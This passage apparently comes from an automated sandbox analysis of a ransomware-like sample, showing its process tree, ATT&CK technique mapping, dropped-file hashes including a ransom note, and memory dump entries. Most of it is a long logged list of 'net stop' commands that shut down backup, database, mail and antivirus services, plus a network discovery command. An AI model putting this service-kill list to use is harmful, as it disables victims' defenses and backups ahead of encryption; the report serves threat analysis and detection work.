C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:14100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:14092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:14084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:14076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:14068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:14060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:14052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:14392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:14932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:14924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:14916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:14908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:14900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:14892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:14884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:14876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:14860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:14852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:14844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:14836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:14828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:14820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:14812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:14804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:14796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:14780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:14772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:14764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:14748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:14740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:14732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:14716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:14708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:14700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:14692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:14684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:14676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:14668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:14660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:14636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:14628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:14612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:14584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:14380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:14372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:14364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:4900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:14044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:14036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:15220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:15204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:15200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:15192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:15184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:15160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:15176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:15168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:13348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:15352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:15344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:15336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:15328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:15320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:15312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:15304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:15296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:15288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:15280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:15272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:15264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:15256

C:\Windows\SysWOW64\net.exe
net view
1⤵
- Discovers systems in the same network
PID:15240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:15248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:15152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:15144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:15136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:15128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:15120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:15112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:15104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:15096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:15088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:15080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:15072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:14028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:14020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:14012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:14004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:13996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:13988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:13980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:13972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:13964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:13952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:13948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:13940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:13932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:13924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:13916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:13908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:13900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:13888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:13880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:13872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:13864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:13856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:13848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:13840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:13812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:13756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:13744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:13736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:13728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:13720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:13712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:13704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:13696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:13688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:13676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:4788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:13228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:13172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:13164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:13156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:13148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:13140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:13132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:13124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:13116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:13092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:13076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:13068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:13056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:13048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:13040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:13028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:13020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:13012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:13004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:12996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:12988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:12980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:12972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:12964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:12956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:12904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:12880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:12872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:12864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:12856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:12848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:12672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:4404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:4388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:4508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:4484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:10596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:10564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:4568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:4392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:4512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:4408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:5104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:11240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:7532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:10480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:11248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:7196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:7588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:7212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:3144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:7492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:7108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:4444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:11576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:4544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:4324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:7204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:4892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:7324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:4808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:4848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:8964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:9004

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:4684

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bb71d4601bf23200e37889c6f843306f

SHA1
ecc61f05df40bc5fb41a74bcfdf1aa17b2605190

SHA256
336a3da039f60d39920a383fe70c859d2a519f7942021a03c2cff7dcd107dcf3

SHA512
6b69cef00b797e86b7a349f980499c5780da0f2e90ac2031f88fa6bbe3b305ff7b41ba1172988b37753d17d4852f408de77f39246eb0e93407b583ad54763484

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b21856ab1c37b65d919a03bb8895a4f7

SHA1
ab989736e1b1be5ca438163b18817238f684a422

SHA256
3488040cf65f61807ba80e59af8cf577a680188d37b8dec56e43d9a6c0a462f2

SHA512
2d16d1bcdad63be04ac3cc9b242a615872f15ca34e79cd60e474335caf8dabc6ccf0a9dad655f9ee35e96380f79f6aab34949687c99f4224f450b32516de6acb

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
MD5
c90fbcae5d4dd377ecb7e54e87543125

SHA1
952851de51d37e71e2118ea0b4ef38fdea8c358c

SHA256
a82b7002192c8d83dbc8e048a52f62941f9fe6c2bcf3b39effec08546557aa41

SHA512
5376d65e80e6615a32f6ddb3879eb81ec4a5ab4f3db327a984390825d3cde4371856bc31fb04f7673f0378ded82a392a0492a7f56d4b8c6fd2bdea6b228efba5

Download Submit
memory/1080-42-0x0000000000000000-mapping.dmp

Download
memory/1392-44-0x0000000000000000-mapping.dmp

Download
memory/1436-101-0x0000000000000000-mapping.dmp

Download
memory/1880-52-0x0000000000000000-mapping.dmp

Download
memory/2100-51-0x0000000000000000-mapping.dmp

Download
memory/2112-53-0x0000000000000000-mapping.dmp

Download
memory/2116-84-0x0000000000000000-mapping.dmp

Download
memory/2476-87-0x0000000000000000-mapping.dmp

Download
memory/2492-2-0x0000000000000000-mapping.dmp

Download
memory/2492-9-0x0000000005680000-0x0000000005681000-memory.dmp

Filesize
4KB

Download
memory/2492-8-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/2492-6-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/2492-5-0x0000000072A90000-0x000000007317E000-memory.dmp

Filesize
6.9MB

Download
memory/2496-41-0x0000000000000000-mapping.dmp

Download
memory/2588-99-0x0000000000000000-mapping.dmp

Download
memory/2824-107-0x0000000000000000-mapping.dmp

Download
memory/2876-88-0x0000000000000000-mapping.dmp

Download
memory/2992-45-0x0000000000000000-mapping.dmp

Download
memory/3040-46-0x0000000000000000-mapping.dmp

Download
memory/3044-49-0x0000000000000000-mapping.dmp

Download
memory/3140-104-0x0000000000000000-mapping.dmp

Download
memory/3288-48-0x0000000000000000-mapping.dmp

Download
memory/3292-15-0x0000000006752000-0x0000000006753000-memory.dmp

Filesize
4KB

Download
memory/3292-38-0x0000000009100000-0x0000000009101000-memory.dmp

Filesize
4KB

Download
memory/3292-36-0x0000000009110000-0x0000000009111000-memory.dmp

Filesize
4KB

Download
memory/3292-35-0x0000000009160000-0x0000000009161000-memory.dmp

Filesize
4KB

Download
memory/3292-34-0x0000000006753000-0x0000000006754000-memory.dmp

Filesize
4KB

Download
memory/3292-33-0x000000007E9E0000-0x000000007E9E1000-memory.dmp

Filesize
4KB

Download
memory/3292-32-0x0000000008FB0000-0x0000000008FB1000-memory.dmp

Filesize
4KB

Download
memory/3292-31-0x0000000008E40000-0x0000000008E41000-memory.dmp

Filesize
4KB

Download
memory/3292-24-0x0000000008E80000-0x0000000008EB3000-memory.dmp

Filesize
204KB

Download
memory/3292-22-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

Filesize
4KB

Download
memory/3292-21-0x00000000080B0000-0x00000000080B1000-memory.dmp

Filesize
4KB

Download
memory/3292-20-0x0000000007A90000-0x0000000007A91000-memory.dmp

Filesize
4KB

Download
memory/3292-19-0x0000000007720000-0x0000000007721000-memory.dmp

Filesize
4KB

Download
memory/3292-17-0x00000000076B0000-0x00000000076B1000-memory.dmp

Filesize
4KB

Download
memory/3292-16-0x0000000007430000-0x0000000007431000-memory.dmp

Filesize
4KB

Download
memory/3292-14-0x0000000006750000-0x0000000006751000-memory.dmp

Filesize
4KB

Download
memory/3292-13-0x0000000006D90000-0x0000000006D91000-memory.dmp

Filesize
4KB

Download
memory/3292-12-0x00000000066F0000-0x00000000066F1000-memory.dmp

Filesize
4KB

Download
memory/3292-11-0x0000000072A90000-0x000000007317E000-memory.dmp

Filesize
6.9MB

Download
memory/3292-10-0x0000000000000000-mapping.dmp

Download
memory/3312-40-0x0000000000000000-mapping.dmp

Download
memory/3884-43-0x0000000000000000-mapping.dmp

Download
memory/3960-50-0x0000000000000000-mapping.dmp

Download
memory/3968-47-0x0000000000000000-mapping.dmp

Download
memory/3976-89-0x0000000000000000-mapping.dmp

Download
memory/4120-90-0x0000000000000000-mapping.dmp

Download
memory/4124-54-0x0000000000000000-mapping.dmp

Download
memory/4132-85-0x0000000000000000-mapping.dmp

Download
memory/4160-55-0x0000000000000000-mapping.dmp

Download
memory/4212-94-0x0000000000000000-mapping.dmp

Download
memory/4236-93-0x0000000000000000-mapping.dmp

Download
memory/4240-56-0x0000000000000000-mapping.dmp

Download
memory/4260-86-0x0000000000000000-mapping.dmp

Download
memory/4264-57-0x0000000000000000-mapping.dmp

Download
